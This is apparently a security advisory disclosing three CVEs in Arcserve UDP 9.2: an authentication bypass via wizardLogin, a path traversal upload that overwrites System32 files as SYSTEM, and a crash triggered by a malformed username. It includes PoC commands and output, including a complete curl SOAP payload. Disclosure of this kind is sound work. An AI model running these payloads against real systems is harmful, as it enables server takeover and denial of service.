Arcserve Unified Data Protection 9.2 Multiple Vulnerabilities

Multiple vulnerabilities exist in Arcserve Unified Data Protection (UDP) 9.2.

CVE-2024-0799 - wizardLogin Authentication Bypass (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

An authentication bypass vulnerability exists in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin(). When a NULL password is passed to the method, a UUID is used for authentication:

  public void doLogin(HttpSession session, Boolean isLocal, String username, String password, String domain, String hostname, String protocol, int port) throws ClientException {

  [...]

      if (password != null) {

        client.getBaseService().validateUser(username, password, domain);

      } else {

        String uuid = CommonUtil.retrieveCurrentAppUUID();

        if (ConsoleConfiguration.getInstance().getRemoteWebservice() != null &&

          Boolean.valueOf(ConsoleConfiguration.getInstance().getRemoteWebservice().getUdpUseWebservice()).booleanValue()) {

          logger.info("get uuid by webservice");

          uuid = client.getBaseService().validateUserByUser(ConsoleConfiguration.getInstance().getRemoteWebservice().getRemoteUdpWebserviceUserName(),

              ConsoleConfiguration.getInstance().getRemoteWebservice().getRemoteUdpWebservicePassword(),

              ConsoleConfiguration.getInstance().getRemoteWebservice().getRemoteUdpWebserviceHost());

        }

        client.getBaseService().validateUserByUUID(uuid);

      }

  [...]

The doLogin() method fetches the correct UUID, so the login would succeed.

An unauthenticated remote attacker can exploit this vulnerability by sending a POST HTTP message without the password parameter to endpoint /management/wizardLogin. Once authenticated, the attacker can perform UDP Console tasks that require authentication.

PoC:

This vulnerability is chained by the following vulnerability to perform unauthenticated path traversal file upload. The PoC for this vulnerability is incorporated into the PoC of the following vulnerability.

CVE-2024-0800 - Authenticated Path Traversal File Upload (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

A path traversal vulnerability exists in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.servlet.ImportNodeServlet. An authenticated remote attacker can exploit this to upload arbitrary files to any directory on the file system where the UDP Console is installed. The upload operation is carried out under the security context of SYSTEM.

PoC:

python3 arcserve_udp_console_wizardLogin_auth_bypass.py -t <target> -p 8015 -f /tmp/malicious_file -s '\Windows\System32\existing_exe_to_be_replaced.exe'

Logging in to Arcserve UDP Console via wizardLogin (Authentication Bypass)

Uploading local file /tmp/malicious_file to \Windows\System32\existing_exe_to_be_replaced.exe on the target host

The local file was uploaded to the target host as the following:

C:\Program Files\Arcserve\Unified Data Protection\Management\Report\Temp\2023_12_01__20_54_58_355\/../../../../../../../../..//Windows/System32/existing_exe_to_be_replaced.exe

CVE-2024-0801 - Unauthenticated DoS in ASNative.dll (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

When logging in to the Arcserve UDP Console with the validateUserByUser API call, the login username is processed by code in ASNative.dll. If the username is a fully qualified username (i.e., domain\username), the domain part is extracted by calling wcsncpy_s():

// ASNative.dll, file version 9.0.6034.674

[...]

.text:0000000180009203 chk_username:            ; CODE XREF: do_login+93↓j

.text:0000000180009203  movzx   eax, word ptr [r14]

.text:0000000180009207  cmp     ax, 5Ch ; '\'

.text:000000018000920B  jz      short loc_18000922C

.text:000000018000920D  cmp     ax, 2Fh ; '/'

.text:0000000180009211  jz      short loc_18000922C

.text:0000000180009213  cmp     ax, 40h ; '@'

.text:0000000180009217  jz      short loc_180009227

.text:0000000180009219  inc     r15

.text:000000018000921C  add     r14, 2

.text:0000000180009220  cmp     r15, rbp

.text:0000000180009223  jb      short chk_username

[...]

.text:0000000180009234  lea     rdi, [r15+r15]

.text:0000000180009238  lea     rcx, [rdi+2]    ; Size

.text:000000018000923C  call    cs:__imp_malloc

.text:0000000180009242  lea     r8, [rdi+2]     ; Size

.text:0000000180009246  xor     edx, edx        ; Val

.text:0000000180009248  mov     rcx, rax        ; void *

.text:000000018000924B  mov     r13, rax

.text:000000018000924E  call    memset

.text:0000000180009253  mov     r9, r15         ; MaxCount

.text:0000000180009256  mov     r8, r12         ; Source

.text:0000000180009259  mov     rdx, rdi        ; SizeInWords

.text:000000018000925C  mov     rcx, r13        ; Destination

.text:000000018000925F copy domain part in domain\username

.text:000000018000925F  call    cs:wcsncpy_s

[...]

If the fully qualified username starts with \ or /, the value 0 is passed as the second parameter to wcsncpy_s(). This will trigger the invalid parameter handler, which by default will terminate the process.

PoC:

curl -sk -H 'Content-Type:text/xml' -d '<?xml version="1.0" encoding="UTF-8"?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUser xmlns:ns2="http://webservice.edge.arcserve.ca.com/"><arg0>\</arg0><arg1>password</arg1><arg2>domain</arg2></ns2:validateUserByUser></S:Body></S:Envelope>' 'https://<target-host>:8015/management/services/EdgeServiceConsoleImpl'